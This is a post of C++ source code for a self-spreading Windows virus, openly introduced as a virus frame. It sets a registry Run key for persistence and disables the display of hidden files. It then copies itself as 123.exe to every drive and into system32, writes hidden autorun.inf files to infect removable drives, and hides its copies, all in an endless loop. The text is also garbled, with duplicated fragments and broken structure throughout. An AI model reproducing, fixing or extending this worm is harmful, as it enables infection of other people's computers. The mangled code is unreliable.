==========================================================================================================
Language: c++ ide : ecilipse
Introduction:This is a simple frame of a virus . it has full of
function copy itself to every drives system32 and removable drive it can
run with
windows and hide the virus files, forbid show the hidden files I will add more function to it so thank you
===========================================================================================================
windows and hide the virus files, forbid show the hidden files I will add more function to it so thank you
===========================================================================================================
#include <windows.h>
using namespace std;
using namespace std;
/*============================
修改或创建数字键值
============================*/
void CreateDWORDReg(HKEY hRoot, char *szSubKey, char *ValueName, DWORD Data) {
HKEY hKey;
//打开注册表,不存在则创建。
long lRet= RegCreateKeyEx(hRoot, szSubKey, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet != ERROR_SUCCESS) {
修改或创建数字键值
============================*/
void CreateDWORDReg(HKEY hRoot, char *szSubKey, char *ValueName, DWORD Data) {
HKEY hKey;
//打开注册表,不存在则创建。
long lRet= RegCreateKeyEx(hRoot, szSubKey, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet != ERROR_SUCCESS) {
return;
}
DWORD dwSize = sizeof(DWORD);
//修改键值,不存在则创建。
lRet = RegSetValueEx(hKey, ValueName, 0, REG_DWORD, (BYTE*)&Data, dwSize);
if (lRet != ERROR_SUCCESS) {
return;
DWORD dwSize = sizeof(DWORD);
//修改键值,不存在则创建。
lRet = RegSetValueEx(hKey, ValueName, 0, REG_DWORD, (BYTE*)&Data, dwSize);
if (lRet != ERROR_SUCCESS) {
return;
}
RegCloseKey(hKey);
}
RegCloseKey(hKey);
}
/*============================
修改或创建字符键值
============================*/
void CreateStringReg(HKEY hRoot, char *szSubKey, char* ValueName, char *Data) {
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegCreateKeyEx %s\n", szSubKey);
return;
}
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, strlen(Data));
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegSetValueEx %s\n", ValueName);
return;
}
RegCloseKey(hKey);
}
修改或创建字符键值
============================*/
void CreateStringReg(HKEY hRoot, char *szSubKey, char* ValueName, char *Data) {
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet=RegCreateKeyEx(hRoot, szSubKey, 0, NULL, REG_OPTION_NON_VOLATILE,
KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegCreateKeyEx %s\n", szSubKey);
return;
}
//修改注册表键值,没有则创建它
lRet=RegSetValueEx(hKey, ValueName, 0, REG_SZ, (BYTE*)Data, strlen(Data));
if (lRet!=ERROR_SUCCESS) {
// printf("error no RegSetValueEx %s\n", ValueName);
return;
}
RegCloseKey(hKey);
}
/*============================
禁止显示隐藏文件
============================*/
void ForbidShow() {
HKEY hKey;
CreateDWORDReg(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", 00000000);
RegCloseKey(hKey);
}
禁止显示隐藏文件
============================*/
void ForbidShow() {
HKEY hKey;
CreateDWORDReg(
HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL",
"CheckedValue", 00000000);
RegCloseKey(hKey);
}
/*============================
随windows自动运行
============================*/
void RunWithWindows() {
HKEY hKey;
CreateStringReg(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "123",
"C:\\WINDOWS\\system32\\123.exe");
RegCloseKey(hKey);
}
随windows自动运行
============================*/
void RunWithWindows() {
HKEY hKey;
CreateStringReg(HKEY_LOCAL_MACHINE,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "123",
"C:\\WINDOWS\\system32\\123.exe");
RegCloseKey(hKey);
}
/*============================
得到所有驱动器
============================*/
void GetLocalDriversPath(char path[255][255]) {
char s[255]={0};
GetLogicalDriveStrings(sizeof(s), s);
int i=0, m, n;
for (m=0; s[i]!=0&&s[i+1]!=0; m++) {
得到所有驱动器
============================*/
void GetLocalDriversPath(char path[255][255]) {
char s[255]={0};
GetLogicalDriveStrings(sizeof(s), s);
int i=0, m, n;
for (m=0; s[i]!=0&&s[i+1]!=0; m++) {
for (n=0; s[i]!=0; i++, n++) {
path[m][n]=s[i];
}
i++;
}
path[m][n]=s[i];
}
i++;
}
}
/*============================
复制文件到目标目录
============================*/
void Copy() {
char topath[255][255]={0};
char path[255]={0};
GetLocalDriversPath(topath);
GetCurrentDirectory(sizeof(path),path);
strcat(path,"\\123.exe");
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i],"\\123.exe");
HANDLE hFile;
CopyFile (path,topath[i],false);
复制文件到目标目录
============================*/
void Copy() {
char topath[255][255]={0};
char path[255]={0};
GetLocalDriversPath(topath);
GetCurrentDirectory(sizeof(path),path);
strcat(path,"\\123.exe");
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i],"\\123.exe");
HANDLE hFile;
CopyFile (path,topath[i],false);
CloseHandle(hFile);
}
CopyFile (path,"C:\\WINDOWS\\system32\\123.exe",false);
}
/*============================
生成autorun
============================*/
void SetAutorun() {
char topath[255][255]={0};
GetLocalDriversPath(topath);
char autorun[512]="[AutoRun] \r\n open=123.exe shell\\open=打开(&o)\r\n shell\\open\\Command=123.exe \r\n shell\\explore=资源管理器(&x) \r\n shell\\explore\\Command=\"123.exe-e\" ";
}
CopyFile (path,"C:\\WINDOWS\\system32\\123.exe",false);
}
/*============================
生成autorun
============================*/
void SetAutorun() {
char topath[255][255]={0};
GetLocalDriversPath(topath);
char autorun[512]="[AutoRun] \r\n open=123.exe shell\\open=打开(&o)\r\n shell\\open\\Command=123.exe \r\n shell\\explore=资源管理器(&x) \r\n shell\\explore\\Command=\"123.exe-e\" ";
/* [AutoRun]
open=123.exe
shell\open=打开(&O)
shell\open\Command=123.exe
shell\explore=资源管理器(&X)
shell\explore\Command="123.exe -e"
*/
open=123.exe
shell\open=打开(&O)
shell\open\Command=123.exe
shell\explore=资源管理器(&X)
shell\explore\Command="123.exe -e"
*/
char Name[255]="\\autorun.inf";
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i], Name);
HANDLE hFile;
hFile=CreateFile(topath[i],GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN,NULL);
DWORD dwWrite;
WriteFile(hFile, &autorun, strlen(autorun), &dwWrite, NULL);
CloseHandle(hFile);
}
}
for (int i=0; topath[i][0]!=0; i++) {
strcat(topath[i], Name);
HANDLE hFile;
hFile=CreateFile(topath[i],GENERIC_WRITE,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN,NULL);
DWORD dwWrite;
WriteFile(hFile, &autorun, strlen(autorun), &dwWrite, NULL);
CloseHandle(hFile);
}
}
/*============================
隐藏文件
============================*/
void Hide() {
char FilesPath[255][255]= { 0 };
char FileName[255]="\\123.exe";
隐藏文件
============================*/
void Hide() {
char FilesPath[255][255]= { 0 };
char FileName[255]="\\123.exe";
GetLocalDriversPath(FilesPath);
for (int i=0; FilesPath[i][0]!=0; i++) {
strcat(FilesPath[i], FileName);
SetFileAttributes(FilesPath[i],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
for (int i=0; FilesPath[i][0]!=0; i++) {
strcat(FilesPath[i], FileName);
SetFileAttributes(FilesPath[i],FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
SetFileAttributes("C:\\WINDOWS\\system32\\123.exe",FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_SYSTEM);
}
/*============================
主函数
============================*/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nShowCmd)
{
主函数
============================*/
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nShowCmd)
{
while(1){
RunWithWindows();
ForbidShow();
Copy();
SetAutorun();
Hide();
Sleep(1000);
}
}
RunWithWindows();
ForbidShow();
Copy();
SetAutorun();
Hide();
Sleep(1000);
}
}